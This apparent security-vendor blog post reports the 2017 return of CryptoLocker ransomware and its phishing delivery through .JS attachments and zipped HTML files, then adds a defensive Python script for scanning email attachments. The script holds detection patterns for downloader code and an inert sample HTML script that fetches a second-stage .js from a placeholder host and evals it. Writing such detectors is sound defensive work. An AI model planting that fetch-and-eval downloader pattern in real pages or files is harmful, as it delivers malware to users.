We all thought that evil genius Evgeniy Bogachev had retired to the Black Sea with his tens of millions of ill-gotten gains after he became the FBI’s #1 Most Wanted cybercriminal. Well, perhaps he ran out of money.
CryptoLocker is back big time. Researchers have spotted a sudden resurgence this year, specifically identifying clusters of attacks in Europe and the U.S.
For people new to the ransomware racket, Russian cybercrime gangs tend to test and debug their campaigns in Europe and then attack America in full force. CryptoLocker is ransomware’s still very potent granddaddy: it pioneered this highly successful criminal business model in September 2013, and hundreds of copycats followed.
In a blog post our friend Larry Abrams from BleepingComputer wrote that the strain — also known as Torrentlocker and Teerac — started its comeback toward the end of January 2017, after being quiet the second half of 2016.
Larry pointed to stats from the ID-Ransomware website which show CryptoLocker infections jumped from just a handful per day to nearly 100 per day, and then to more than 400 per day by February.
He also confirmed CryptoLocker’s recent tsunami with Microsoft’s Malware Protection Center, whose telemetry picked up on increased attacks against Europe, especially Italy. The phishing emails are designed to look secure and official because they are digitally signed, but it is all just social engineering to trick the recipient and get them to open attached .JS files that download and install CryptoLocker.
Check Point Software Technologies confirmed with SC Media that its researchers also observed a sudden rise in CryptoLocker attacks. The phishing emails attempt to trick recipients into opening a zipped HTML file. “The HTML contains a JS file, which pulls a second JS file from an Amazon server, which executes the first one in memory,” said Lotem Finklesteen, threat intelligence researcher at Check Point.
“Then, after pulling two more JS files, CryptoLocker is served to the victim machine and executed. The vast majority of the infections we observed this week were in the U.S. The second major target was Western Europe, especially Germany,” said Finklesteen.
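Both the Microsoft and Check Point descriptions above come down to the same delivery pattern: a .JS attachment, or a zipped HTML file carrying script, that acts as a downloader and pulls further script stages before the ransomware itself arrives. The mail gateway is the cheapest place to stop that chain. The following is an added example, not code from KnowBe4, BleepingComputer, Microsoft or Check Point: a small attachment-triage script that unpacks zipped attachments in memory, flags script-type members (.js, .html, .hta and friends) and looks for the telltale downloader constructs (script host objects, XMLHTTP fetches, remote .js URLs, eval of fetched text). The sample message, the inert HTML "downloader" inside it, and the indicator list are all constructed for illustration; the indicators are a generic heuristic, not a signature for the actual CryptoLocker scripts.

```python
"""
Attachment triage for the script-based delivery chain described in the article.
Added example; not the code of any vendor or researcher quoted on the page.
The sample message and HTML "downloader" are constructed, inert illustrations.
"""
import email
import email.policy
import io
import os
import re
import zipfile
from email.message import EmailMessage

# Attachment/member extensions that should not arrive by email in most environments.
SCRIPT_EXTENSIONS = {".js", ".jse", ".vbs", ".wsf", ".hta", ".html", ".htm"}
MAX_MEMBER_BYTES = 1 * 1024 * 1024  # read at most 1 MiB per archive member (zip-bomb guard)

# Generic downloader constructs (illustrative heuristic, not a CryptoLocker signature).
SUSPICIOUS_PATTERNS = {
    "activex_object": re.compile(r"ActiveXObject", re.I),
    "wscript_shell": re.compile(r"WScript\.Shell", re.I),
    "xmlhttp": re.compile(r"XMLHTTP", re.I),
    "eval_call": re.compile(r"\beval\s*\("),
    "remote_script": re.compile(r"https?://[^\s'\"<>]+\.js\b", re.I),
}


def script_indicators(text):
    """Return the sorted names of downloader patterns found in script/HTML text."""
    return sorted(name for name, rx in SUSPICIOUS_PATTERNS.items() if rx.search(text))


def _extension(filename):
    return os.path.splitext(filename.lower())[1]


def triage_attachment(filename, data):
    """Return a list of findings for one attachment; an empty list means nothing was flagged."""
    findings = []
    ext = _extension(filename)
    if ext in SCRIPT_EXTENSIONS:
        # Bare script attachment, as in the .JS campaign Microsoft described.
        findings.append(f"{filename}: script-type attachment ({ext})")
        for name in script_indicators(data.decode("utf-8", errors="replace")):
            findings.append(f"{filename}: matches {name}")
        return findings

    if zipfile.is_zipfile(io.BytesIO(data)):
        # Zipped HTML/JS, as in the campaign Check Point described.
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            for info in zf.infolist():
                member_ext = _extension(info.filename)
                if member_ext not in SCRIPT_EXTENSIONS:
                    continue
                findings.append(f"{filename}: archive member {info.filename!r} is {member_ext}")
                if info.file_size > MAX_MEMBER_BYTES:
                    findings.append(f"{filename}: member {info.filename!r} too large to scan")
                    continue
                with zf.open(info) as fh:
                    text = fh.read(MAX_MEMBER_BYTES).decode("utf-8", errors="replace")
                for name in script_indicators(text):
                    findings.append(f"{filename}: member {info.filename!r} matches {name}")
    return findings


def triage_message(raw):
    """Map each attachment filename in a raw RFC 5322 message to its findings."""
    msg = email.message_from_bytes(raw, policy=email.policy.default)
    report = {}
    for part in msg.iter_attachments():
        name = part.get_filename() or "(unnamed)"
        payload = part.get_payload(decode=True) or b""
        report[name] = triage_attachment(name, payload)
    return report


# Constructed sample: inline script shaped like the first stage in the article
# (fetch a second script, eval it in memory). The URL is reserved/invalid; nothing is fetched.
SAMPLE_HTML = b"""<html><body><script>
var x = new ActiveXObject("MSXML2.XMLHTTP");
x.open("GET", "http://example.invalid/stage2.js", false);
x.send();
eval(x.responseText);
</script></body></html>"""


def build_sample_message():
    """Build a constructed invoice-themed message with a zipped HTML attachment and a clean PDF."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("invoice.html", SAMPLE_HTML)
    msg = EmailMessage()
    msg["From"] = "billing@example.invalid"
    msg["To"] = "victim@example.invalid"
    msg["Subject"] = "Invoice 2017-02"
    msg.set_content("Please see the attached invoice.")
    msg.add_attachment(buf.getvalue(), maintype="application", subtype="zip", filename="invoice.zip")
    msg.add_attachment(b"%PDF-1.4 clean placeholder", maintype="application", subtype="pdf", filename="terms.pdf")
    return msg.as_bytes()


if __name__ == "__main__":
    for name, findings in triage_message(build_sample_message()).items():
        print(name, findings or ["clean"])
```

Run as-is, the script flags invoice.zip (an .html member matching the ActiveXObject, XMLHTTP, remote-.js and eval patterns) and reports terms.pdf as clean. In production you would quarantine on the extension check alone, before any content heuristics run, since there is rarely a business reason for .js or .hta to arrive by mail; the pattern matching is there to prioritise analyst review, and the per-member size cap keeps a crafted archive from exhausting the scanner.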
Ransomware as a global threat
Microsoft’s Malware Protection Center blog stated: “Ransomware proved to be a truly global threat in 2016, having been observed in more than 200 territories. In the US alone, ransomware was encountered in more than 460,000 computers or 15% of global encounters. Italy and Russia follow with 252,000 and 192,000 ransomware encounters, respectively. Korea, Spain, Germany, Australia, and France all registered more than 100,000 encounters.” Here is their geographic distribution chart.
For help in stopping Ransomware in its tracks contact us today, 317-939-3282